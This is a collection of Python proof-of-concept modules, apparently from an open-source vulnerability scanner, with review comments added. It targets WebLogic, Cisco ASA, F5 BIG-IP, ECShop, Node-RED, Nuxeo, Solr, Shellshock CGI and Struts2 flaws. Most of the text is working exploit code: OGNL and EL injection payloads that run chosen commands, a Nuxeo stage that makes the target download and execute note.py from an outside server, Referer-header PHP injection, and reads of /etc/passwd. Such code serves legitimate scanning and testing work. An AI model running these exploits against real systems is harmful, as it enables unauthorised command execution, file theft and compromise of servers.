             < /soapenv:Header> < soapenv:Body/> < /soapenv:Envelope>'''.format(output_file, command_filtered)
            return payload_1

        # Result check
        '''
        检查结果
        '''
        def verify_result(target):
            """Fetch the written file; ``(True, 'success')`` when it contains ``flag``."""
            headers = {
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
            # Append a timestamp so the response is not served from a cache
            output_url = '{}/bea_wls_internal/{}?{}'.format(
                target, output_file, int(time.time()))
            try:
                r = req.get(output_url, headers=headers)
                if r.status_code == req.codes.ok and flag in r.text:
                    return (True, 'success')
                elif r.status_code == 404:
                    return (False, '404 no output')
                else:
                    return (False, r.status_code)
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        # RCE PoC
        '''
        RCE POC
        '''
        def weblogic_rce(target):
            """Post the payload to CoordinatorPortType; on 500, defer to ``verify_result``."""
            url = '{}/wls-wsat/CoordinatorPortType'.format(target)
            # content-type must be text/xml
            payload_header = {'content-type': 'text/xml',
                              'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
            try:
                r = req.post(url, payload_command(),
                             headers=payload_header, verify=False)
                # A 500 indicates the payload was deserialized and executed
                if r.status_code == 500:
                    return verify_result(target)
                elif r.status_code == 404:
                    return (False, '404 no vulnerability')
                else:
                    return (False, '{} something went wrong'.format(r.status_code))
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        '''
        verify:
        '''
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = weblogic_rce(uri)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                break

        return self.parse_output(result)

    def _attack(self):

0 Source : CVE-2020-3452.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check a Cisco ASA/FTD web portal for the CVE-2020-3452 path traversal.

        Two read-only probe URLs are requested (TLS verification disabled,
        5 s timeout) before either body is inspected; the first whose body
        names a known portal Lua file is reported, with its path template
        recorded under ``PoC``.  Exceptions are logged and yield an empty
        result.
        """
        findings = {}
        target = self.url

        probe_templates = (
            '{}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../',
            '{}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua',
        )
        markers = ('common.lua', 'browser_inc.lua')

        try:
            responses = [requests.get(template.format(target), verify=False, timeout=5)
                         for template in probe_templates]

            for template, response in zip(probe_templates, responses):
                if any(marker in response.text for marker in markers):
                    findings['VerifyInfo'] = {
                        'URL': target,
                        'PoC': template.format(''),
                    }
                    break
        except Exception as exc:
            logger.error(str(exc))
        return self.parse_output(findings)

    def _attack(self):

0 Source : CVE-2020-5902.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for CVE-2020-5902 (F5 TMUI) and report a finding.

        Sends a fixed sequence of four requests against the host derived from
        self.url: create a cli alias, save a command file, list it, and finally
        delete the alias again. A finding is recorded when the third response
        contains 'uid=0(root)'; the hostname is then scraped from the login page.
        Errors inside the try block are logged; the cleanup request on the last
        line runs regardless.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        result = {}
        # print(self.url)
        # NOTE(review): only the "http://" prefix is stripped. An "https://"
        # self.url is left intact and the templates below would then build
        # "https://https://..." URLs.
        url = self.url.replace("http://", "")
        # print(url)

        try:
            url1 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
            url2 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'
            url3 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
            url4 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

            # Order matters: the alias must exist before the file is listed.
            # Responses of the first two requests are not inspected.
            requests.get(url1.format(url), verify=False, timeout=5)
            requests.get(url2.format(url), verify=False, timeout=5)

            # flag = random_str(length=10)

            resp = requests.get(url3.format(url), verify=False, timeout=5)
            if 'uid=0(root)' in resp.text:
                r = requests.get(
                    'https://{}/tmui/login.jsp'.format(url), verify=False, timeout=5)
                # NOTE(review): .group(1) raises AttributeError when the title
                # pattern is absent; that is caught by the handler below and the
                # finding is then dropped even though the body check matched.
                hostname = re.search(
                    r'  <  p\stitle=\"(.*?)\">', r.text).group(1).strip().lower()
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Hostname'] = hostname
        except Exception as ex:
            logger.error(str(ex))
        # Cleanup: remove the alias created by url1. NOTE(review): this call is
        # outside the try block, so a timeout here propagates to the caller and
        # the artifact may be left on the target.
        requests.get(url4.format(url), verify=False, timeout=5)
        return self.parse_output(result)

    def _attack(self):

0 Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check an ECShop login page for the Referer-injection RCE.

        Builds a 2.x and/or 3.x payload (via self.gen_ec2payload /
        self.gen_ec3payload) carrying phpinfo() and sends each as the Referer
        header of a GET to /user.php?act=login. A finding with the detected
        version is recorded when the response contains 'allow_url_include'.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        result = {}
        url = urljoin(self.url, '/user.php?act=login')
        phpcode = "phpinfo()"
        # Marker expected in phpinfo() output.
        flagText = "allow_url_include"

        # ECShop 2.x payload
        ec2payload = self.gen_ec2payload(phpcode)
        # ECShop 3.x payload
        ec3payload = self.gen_ec3payload(phpcode)

        option = self.get_option("app_version")

        # NOTE(review): no else branch — any app_version other than the three
        # below leaves `payloads` unbound and the loop raises UnboundLocalError.
        if option == "Auto":
            payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
        elif option == "2.x":
            payloads = [(ec2payload, '2.x')]
        elif option == '3.x':
            payloads = [(ec3payload, '3.x')]

        for payload, version in payloads:
            headers = {'Referer': payload}
            try:
                rr = requests.get(url, headers=headers)
                if flagText in rr.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Version'] = version
                    break
            except ReadTimeout:
                # A timeout stops the scan entirely rather than trying the next payload.
                break
            except Exception as e:
                # NOTE(review): all other errors are silently swallowed, so a
                # connection failure is indistinguishable from "not vulnerable".
                pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443

    def _exploit(self, cmd='whoami'):
        """Run *cmd* through the ECShop Referer injection and return its output.

        Wraps *cmd* in passthru(), builds the payload(s) selected by the
        app_version option and sends each as the Referer header. The command
        output is cut out of the response with get_middle_text() using the
        hidden back_act input as the start marker.

        Args:
            cmd: Shell command to embed in the payload (default 'whoami').

        Returns:
            The extracted text for the first payload that yields one, else None
            (implicit). Request exceptions are not caught here.
        """
        url = urljoin(self.url, '/user.php?act=login')

        phpcode = 'passthru("{0}");'.format(cmd)

        # ECShop 2.x payload
        ec2payload = self.gen_ec2payload(phpcode)
        # ECShop 3.x payload

        ec3payload = self.gen_ec3payload(phpcode)
        option = self.get_option("app_version")
        # NOTE(review): as in _verify, an unexpected app_version leaves
        # `payloads` unbound and the loop below raises.
        if option == "Auto":
            payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
        elif option == "2.x":
            payloads = [(ec2payload, '2.x')]
        elif option == '3.x':
            payloads = [(ec3payload, '3.x')]
        # payloads = [ec2payload, ec3payload]

        for payload in payloads:
            # payload is a (payload, version) tuple; only the payload is sent.
            headers = {'Referer': payload[0]}
            resp = requests.get(url, headers=headers)
            # Two end markers are tried in turn; get_middle_text is a project
            # helper — presumably returns the text between the two markers.
            r = get_middle_text(resp.text, '''  <  input type="hidden" name="back_act" value="''', "\n < br />")
            if r:
                return r
            r = get_middle_text(resp.text, ''' < input type="hidden" name="back_act" value="''', 'xxx')
            if r:
                return r


# Register the PoC class with the framework so it can be loaded by name.
register_poc(DemoPOC)

0 Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443

async def exploit(url, command, shell=False, access_token=None):
    """Inject an exec flow into a Node-RED instance and return the command output.

    Opens the /comms WebSocket (authenticating with *access_token* when given),
    subscribes to debug messages, merges EXEC_FLOW into the current /flows
    document with *command* set on the EXEC_BLOCK_NAME node, posts it back and
    triggers INJECT_BLOCK_NAME. Unless *shell* is true, waits for the first
    debug message and returns its stripped msg text.

    Args:
        url: Base HTTP(S) URL of the Node-RED instance.
        command: Command written into the exec node.
        shell: When true, do not wait for output (returns None).
        access_token: Optional bearer token used for both HTTP and WebSocket auth.

    Returns:
        The debug output string, or None when *shell* is true.
    """
    # NOTE(review): a plain str.replace — "http" → "ws" also turns "https" into "wss",
    # which is presumably intended.
    ws_url = url.replace("http", "ws")
    headers = {"Node-RED-API-Version": "v2"}

    if access_token is not None:
        headers["Authorization"] = "Bearer {}".format(access_token)

    async with websockets.connect("{}/comms".format(ws_url)) as websocket:
        if access_token is not None:
            await websocket.send(json.dumps({"auth": access_token}))
            # Loops until an {"auth": "ok"} message arrives; no timeout or
            # failure branch, so a rejected token blocks here indefinitely.
            while True:
                response = await websocket.recv()
                message = json.loads(response)
                if "auth" in message and message["auth"] == "ok":
                    print("[+] Successfully authenticated over WebSocket.")
                    break

        print("[+] Establishing RCE link ....")
        await websocket.send(json.dumps({"subscribe": "debug"}))
        current_flows = {"flows": []}
        try:
            resp = requests.get("{}/flows".format(url), headers=headers)
            if "flows" in resp.json():
                current_flows["flows"] = resp.json()["flows"]
            # merge_lists / EXEC_FLOW / EXEC_BLOCK_NAME are module-level names
            # defined outside this excerpt.
            payload = {"flows": merge_lists(current_flows["flows"], EXEC_FLOW, "id")}
            for flow in payload["flows"]:
                if flow["id"] == EXEC_BLOCK_NAME:
                    flow["command"] = command

            # Responses of the two POSTs are not checked for success.
            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )

            resp = requests.post("{}/inject/{}".format(url, INJECT_BLOCK_NAME), headers=headers)

            output = None
            if not shell:
                while output is None:
                    response = await websocket.recv()
                    messages = json.loads(response)
                    for message in messages:
                        if "topic" in message and message["topic"] == "debug":
                            output = message["data"]["msg"].strip()
                            break

        except KeyboardInterrupt:
            # Restore the original flows, dropping any block whose id matches
            # one from EXEC_FLOW.
            payload = {"flows": []}
            for current_block in current_flows["flows"]:
                tainted = False
                for block in EXEC_FLOW:
                    if block["id"] == current_block["id"]:
                        tainted = True
                if not tainted:
                    payload["flows"].append(current_block)

            print("\n[+] Cleaning up workflows.")
            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )
            if resp.status_code == 200:
                print("[+] Done.")
            else:
                print("[!] An error occured. Manual cleanup might be required.")
        finally:
            # NOTE(review): close() on a websockets connection is a coroutine and
            # is not awaited here; the `async with` exit closes the socket anyway.
            websocket.close()
        # NOTE(review): if the interrupt fires before `output = None` is reached,
        # `output` is unbound here and this line raises UnboundLocalError.
        return output


def start(url, command, username, password, shell=False):

0 Source : ruijie_info.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check a Ruijie login.php page for leaked super_admin credentials.

        Fetches login.php under self.url with a browser-like User-Agent and
        records a finding when both verify_code markers (a super_admin role
        fragment and a password field fragment) appear in the body.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        result = {}
        ####
        headers = {
            "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20"
        }

        path = "login.php"

        # Markers of the JSON-like credential blob expected in the page source.
        verify_code = '"role":"super_admin","name":"'
        verify_code2 = '","password":"'

        url = urljoin(self.url, path)

        # NOTE(review): the request itself is outside the try block, so
        # connection errors and timeouts propagate instead of being logged.
        resp = requests.get(url=url, headers=headers, timeout=8)
        # resp = requests.post(url, data=payload)
        try:
            if verify_code in resp.text and verify_code2 in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = "源代码密码泄露,页面搜索admin关键词即可看到密码hash"
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Send the Nuxeo 8.10 EL-injection stage-1 request and mark success on 200/302.

        The payload instructs the server to wget note.py from the host/port given
        by the http_server_ip / http_server_port options. Only the HTTP status
        is inspected; a 200 or 302 sets result['status'] = 'success'.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        # NOTE(review): `proxies` is built but never passed to requests.get,
        # so the request goes direct.
        proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }
        result = {}
        httpServerIp = self.get_option('http_server_ip')
        httpServerPort = self.get_option('http_server_port')
        # The string goes through format(), so the payload's own braces are
        # doubled ({{ }}) — otherwise format() raises.
        payload_part1 = "/?key=#{{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
                        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
                        "'wget {0}:{1}/note.py')}}".format(httpServerIp, httpServerPort)
        url = urljoin(self.url, "/nuxeo/create_file.xhtml")
        params = {
            'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
            'directoryNameForPopup': payload_part1
        }
        try:
            rr = requests.get(url, params=params, verify=False)
            # NOTE(review): a 200/302 is treated as success without any body
            # check, so a non-vulnerable page that simply renders also "succeeds".
            if rr.status_code == 302 or rr.status_code == 200:
                result['status'] = 'success'
        except ReadTimeout:
            pass
        except Exception as e:
            # Errors are swallowed; the caller sees an empty result.
            pass

        return self.parse_output(result)

    def _attack(self):

0 Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443

    def _shell(self):
        """Send the Nuxeo stage-2 request that runs the previously fetched note.py.

        Calls self._verify() first (stage 1), then issues the same EL-injection
        request with a 'python note.py' command. The response is not used and
        the method returns None; all request errors are swallowed.
        """
        self._verify()

        # NOTE(review): unused — never passed to requests.get.
        proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }

        # No format() here, so single braces are correct.
        payload_part2 = "/?key=#{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
                        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
                        "'python note.py')}"

        url = urljoin(self.url, "/nuxeo/create_file.xhtml")
        params = {
            'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
            'directoryNameForPopup': payload_part2
        }
        try:
            rr = requests.get(url, params=params, verify=False)
            # Status is checked but nothing is recorded either way.
            if rr.status_code == 302 or rr.status_code == 200:
                pass
        except ReadTimeout:
            pass
        except Exception as e:
            pass

# Register the PoC class with the framework so it can be loaded by name.
register_poc(DemoPOC)

0 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check a CGI/shell endpoint for Shellshock via a crafted User-Agent.

        get_url_need() (project helper) picks the candidate URL; only targets
        ending in .cgi or .sh are tested. A random 50-character marker is
        echoed back through the User-Agent; a finding is recorded when the
        first line of the response body equals 'X-Bash-Test: <marker>'.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        result = {}

        try:
            vul_url = get_url_need(self.url)
            if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):
                pass
            else:
                # sample() draws without replacement, so the marker has no
                # repeated characters; the local name shadows any random_str import.
                random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
                headers_fake = {}
                headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str

                response = requests.get(vul_url, headers=headers_fake)
                response = response.text

                # Exact match on the first body line keeps false positives
                # (e.g. the header merely reflected somewhere in the page) out.
                if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_url
        except Exception as e:
            logger.exception(e)
        return self.parse_output(result)

    def parse_output(self, result):

0 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

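def get_link(url):
    """Return the first same-domain link on *url* whose target ends in .cgi, .sh or .pl.

    The page at *url* is fetched with ``requests.get`` and its body scanned for
    ``href``/``action``/``src`` attributes pointing at .cgi/.sh/.pl files.
    Relative targets are resolved with ``getAbsoluteURL``; targets rejected by
    ``is_url_exist`` are skipped; the first one ``isSameDomain`` accepts wins.

    Args:
        url: Page URL to scan for candidate script links.

    Returns:
        The first matching URL on the same domain as *url*, or '' when nothing
        matches or when the fetch / helper calls fail.
    """
    rnt = ''
    try:
        # NOTE(review): no explicit timeout is passed; whether one applies
        # depends on the requests wrapper in use.
        page_content = requests.get(url).text
        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
        for item_url in match:
            if not item_url.startswith('http'):
                item_url = getAbsoluteURL(url, item_url)
            if not is_url_exist(item_url):
                continue
            if isSameDomain(item_url, url):
                rnt = item_url
                break
        return rnt
    except Exception:
        # Best-effort crawl: any request/parse failure yields ''. Narrowed from
        # a bare `except:` so KeyboardInterrupt/SystemExit are no longer swallowed.
        return rnt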


def getAbsoluteURL(base, url):

0 Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check a Solr instance for the RemoteStreaming file-read and report a finding.

        For each candidate port (the URL's own port, else 8983) this lists the
        cores, enables requestDispatcher.requestParsers.enableRemoteStreaming on
        the first core via its /config endpoint, then asks /debug/dump to stream
        file:///etc/passwd. A finding is recorded unless the dump response says
        'No such file or directory'.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # Fetch the core list.
            url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            response = req.get(url1, headers=headers,timeout=5)
            # NOTE(review): no try/except and no status check — a non-JSON body,
            # a missing "status" key or an empty core list raises out of _verify.
            core_name = list(json.loads(response.text)["status"])[0]
            # Enable requestDispatcher.requestParsers.enableRemoteStreaming.
            url2 = target + "/solr/" + core_name + "/config"
            headers = {"Content-type":"application/json"}
            data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
            # NOTE(review): the body is sent with req.get (a GET with a body),
            # not a POST — confirm the wrapper forwards `data` as intended.
            response = req.get(url2, data=data,headers=headers, timeout=5)
            if 'responseHeader' in response.text and response.status_code == 200:
                # Read the file.
                url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                data = 'stream.url=file:///etc/passwd'
                response = req.get(url3, data=data, headers=headers, timeout=5)
                # Negative match only: any other error page also counts as a hit.
                if 'No such file or directory' not in response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                    break
        return self.parse_output(result)

    def _attack(self):

0 Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Read the file named by the 'filename' option through Solr RemoteStreaming.

        Same flow as _verify (list cores, enable remote streaming on the first
        core, stream a file:// URL via /debug/dump) but the path comes from
        self.get_option("filename") and the dump body is stored as evidence.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # Fetch the core list.
            url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            # Timeout here is 10 s, versus 5 s in _verify.
            response = req.get(url1, headers=headers, timeout=10)
            # NOTE(review): unguarded JSON/key access — raises on an unexpected body.
            core_name = list(json.loads(response.text)["status"])[0]
            # Enable requestDispatcher.requestParsers.enableRemoteStreaming.
            url2 = target + "/solr/" + core_name + "/config"
            headers = {"Content-type":"application/json"}
            data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
            response = req.get(url2, data=data,headers=headers, timeout=5)
            if 'responseHeader' in response.text and response.status_code == 200:
                # Read the file.
                filename = self.get_option("filename")
                url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                data = 'stream.url=file://{}'.format(filename)
                response = req.get(url3, data=data, headers=headers, timeout=5)
                if 'No such file or directory' not in response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                    # The whole dump body is returned as evidence.
                    result['extra'] = {}
                    result['extra']['evidence'] = response.text
                    break
        return self.parse_output(result)

    def _shell(self):

0 Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for Struts2 S2-008 by echoing a fixed marker through the debug parameter.

        Appends the OGNL payload (with RECOMMAND replaced by an echo of
        VuLnEcHoPoCSuCCeSS) to self.url and records a finding when the GET
        returns 200 with the marker in the body.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = '?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%' \
            '23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio' \
            'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%' \
            '27RECOMMAND%27%29.getInputStream%28%29%29)'
        payload = payload.replace("RECOMMAND", cmd)
        # Plain concatenation: self.url is assumed to carry no query string already.
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            # `response and ...` relies on Response truthiness (presumably its ok flag).
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            # NOTE(review): errors are swallowed, so a connection failure is
            # reported the same as "not vulnerable".
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Run the 'command' option through the S2-008 debug parameter and return stdout.

        Same payload as _verify with RECOMMAND replaced by the option value;
        on a 200 response the whole body is stored in result['Stdout'].

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        result = {}
        cmd = self.get_option("command")
        # NOTE(review): the option is substituted verbatim into the URL; it is
        # neither URL-encoded nor validated here.
        payload = '?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%' \
                  '23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio' \
                  'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%' \
                  '27RECOMMAND%27%29.getInputStream%28%29%29)'
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass
        return self.parse_output(result)


# Register the PoC class with the framework so it can be loaded by name.
register_poc(DemoPOC)

0 Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for Struts2 S2-009 by echoing a fixed marker through the OGNL payload.

        The payload is appended to self.url AND passed as the request body
        (data=) of the GET. A finding is recorded on a 200 response containing
        VuLnEcHoPoCSuCCeSS; the payload is stored under 'Postdata'.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false)," \
                  "+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(" \
                  "%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a)," \
                  "%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d)," \
                  "%[email protected]@getResponse().getWriter(),%23kxlzx.println(" \
                  "%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] "
        payload = payload.replace("RECOMMAND", cmd)
        # NOTE(review): no '?' separator — the payload is appended directly to self.url.
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            # The same payload travels both in the URL and as the GET body.
            response = requests.get(url, headers=HEADERS, data=payload)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Postdata'] = payload
        except ReadTimeout:
            pass
        except Exception as e:
            # Errors are swallowed; indistinguishable from "not vulnerable".
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Run the 'command' option through the S2-009 payload and return stdout.

        Same request shape as _verify (payload in URL and GET body); on a 200
        response the whole body is stored in result['Stdout'].

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        # NOTE(review): the option value is substituted verbatim, without encoding.
        payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false)," \
                  "+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(" \
                  "%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a)," \
                  "%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d)," \
                  "%[email protected]@getResponse().getWriter(),%23kxlzx.println(" \
                  "%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] "
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS, data=payload)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


# Register the PoC class with the framework so it can be loaded by name.
register_poc(DemoPOC)

0 Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for Struts2 S2-013 by echoing a fixed marker via a ${...} parameter.

        Appends the URL-encoded OGNL payload (RECOMMAND replaced by an echo of
        VuLnEcHoPoCSuCCeSS) to self.url and records a finding on a 200 response
        whose body contains the marker.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
